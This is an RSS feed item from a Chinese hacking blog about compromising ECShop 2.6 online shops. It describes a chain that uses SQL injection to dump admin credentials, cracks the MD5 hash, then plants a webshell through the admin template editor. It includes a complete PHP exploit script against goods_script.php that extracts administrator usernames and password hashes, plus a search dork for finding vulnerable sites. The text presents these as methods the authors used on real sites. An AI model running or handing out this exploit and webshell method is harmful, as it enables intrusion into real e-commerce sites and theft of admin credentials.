后台拿shell超简单版</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1082.html</link><pubDate>Sat, 23 Jan 2010 20:32:26 +0800</pubDate><guid>http://www.nhs8.com/post/1082.html</guid><description><![CDATA[<p>by神刀 <a href="http://www.nhs8.com/">www.nhs8.com</a></p><p>天气又冷了~~多穿点！</p><p>&nbsp;ECShop Exp 下载：<a href="http://www.nhs8.com/upload/201001232034122405.rar" target="_blank">201001232034122405.rar</a></p><p>1.针对2.6最近的oday，先注出了账号密码，拿去md5算出！</p><p>2./admin 登录进后台 库模板直接插一句话或者整个webshell直接上！</p><p>ps：遇到了个linux的，权限限死，不给运行，直接插到页面里直接运行！</p><p><img title="" alt="" src="http://www.nhs8.com/upload/201001232047184374.jpg" onload="ResizeImage(this,520)" /></p><p>以下转个文章更具体点！</p><p><font size="2">尝试了一个网站注入进了后台之后，在网上查了一下ECSHOP后台拿shell的方法，发现网上传阅的基本上都是oldjun大牛的那篇《ECSHOP后台拿shell的方法》文章。说实话这篇文章当做教材学技术用还可以，但实际用起来几乎是不可能的，因为那个方法的前提是register_globals为on的环境，可是现在这样的环境几乎为零，所以必须另需他法。</font></p><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在oldjun大牛的博客看这篇文章的时候，注意了一下底下的评论，就发现了好东西。如图：&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font></p><p><font size="2">&nbsp;&nbsp;&nbsp;</font><font size="2"><img class="blogimg" alt="" src="http://www.nhs8.com/upload/201001232048425464.jpg" border="0" small="0" /></font></p><div forimg="1"><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 我注入进一个后台，然后按照步骤尝试了一下，果真成功。如下步骤：</font></p><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font size="2"><img class="blogimg" alt="" src="http://www.nhs8.com/upload/201001232048465104.jpg" border="0" small="0" /></font></p><div forimg="1" align="center"><p><font size="2"><img class="blogimg" alt="" src="http://www.nhs8.com/upload/201001232048466686.jpg" border="0" small="0" /></font></p></div><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font size="2"> 点确定之后访问</font><a href="http://www.nhs8.com/upload/201001232048465311.jpg" border="0" small="0" /></font></p><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个方法的原理据说是ECSHOP的smarty模板机制是允许直接执行php代码，从而导致漏洞产生。我的smarty没什么了解，不过会努力的。</font></p><p><font size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个方法真的很好，再次领教了牛人的技术。只是发现网上没什么提这种方法的，所以我看到了就和大家分享下。</font></p><p>&nbsp;</p><p>&nbsp;</p><p><font size="2">ps:<a href="http://bbs.wolvez.org/topic/67/"><font color="#000000" size="2">http://bbs.wolvez.org/topic/67/</font></a></font></p><div class="entry-content"><div class="codebox"><pre><div forimg="1"><div class="entry-content"><div class="codebox"><pre><div forimg="1"><div class="entry-content"><p><code></code></p><p>&nbsp;</p><p>by Ryat<br /><a href="http://bbs.wolvez.org/">http://bbs.wolvez.org</a><br />2009-03-24</p></div><div class="codebox"><pre>影响2.5.x和2.6.x,其他版本未测试</pre><pre>goods_script.php44行:</pre></div>&nbsp;&nbsp;&nbsp; if (empty($_GET['type']))<br />&nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br />&nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; elseif ($_GET['type'] == 'collection')<br />&nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br />&nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; $sql .= &quot; LIMIT &quot; . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);<br />&nbsp;&nbsp;&nbsp; $res = $db-&gt;query($sql);<p>&nbsp;</p><div class="entry-content"><p>$sql没有初始化,很明显的一个漏洞:)</p><p>EXP:<br />&nbsp;</p><div class="codebox"><pre><code>#!/usr/bin/php&lt;?phpprint_r('+---------------------------------------------------------------------------+ECShop &lt;= v2.6.2 SQL injection / admin credentials disclosure exploitby puret_tmail: puretot at gmail dot comteam: http://bbs.wolvez.orgdork: &quot;Powered by ECShop&quot;+---------------------------------------------------------------------------+');/** * works with register_globals = On */if ($argc &lt; 3) {    print_r('+---------------------------------------------------------------------------+Usage: php '.$argv[0].' host pathhost:      target server (ip/hostname)path:      path to ecshopExample:php '.$argv[0].' localhost /ecshop/+---------------------------------------------------------------------------+');    exit;}error_reporting(7);ini_set('max_execution_time', 0);$host = $argv[1];$path = $argv[2];$resp = send();preg_match('#href=&quot;([\S]+):([a-z0-9]{32})&quot;#', $resp, $hash);if ($hash)    exit(&quot;Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n&quot;);else    exit(&quot;Exploit Failed!\n&quot;);function send(){    global $host, $path;    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';    $data = &quot;POST &quot;.$path.&quot;goods_script.php?type=&quot;.time().&quot;  HTTP/1.1\r\n&quot;;    $data .= &quot;Accept: */*\r\n&quot;;    $data .= &quot;Accept-Language: zh-cn\r\n&quot;;    $data .= &quot;Content-Type: application/x-www-form-urlencoded\r\n&quot;;    $data .= &quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n&quot;;    $data .= &quot;Host: $host\r\n&quot;;    $data .= &quot;Content-Length: &quot;.strlen($cmd).&quot;\r\n&quot;;    $data .= &quot;Connection: Close\r\n\r\n&quot;;    $data .= $cmd;    $fp = fsockopen($host, 80);    fputs($fp, $data);    $resp = '';    while ($fp &amp;&amp; !feof($fp))        $resp .= fread($fp, 1024);    return $resp;}?&gt;</code></pre></div></div></div></pre></div></div></div></pre></div></div></div><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1082.html" target="_blank">继续阅读《ECSHOP 2.6 后台拿shell超简单版》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1082.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1082.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1082</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1082&amp;key=ce97af31</trackback:ping></item></channel></rss>

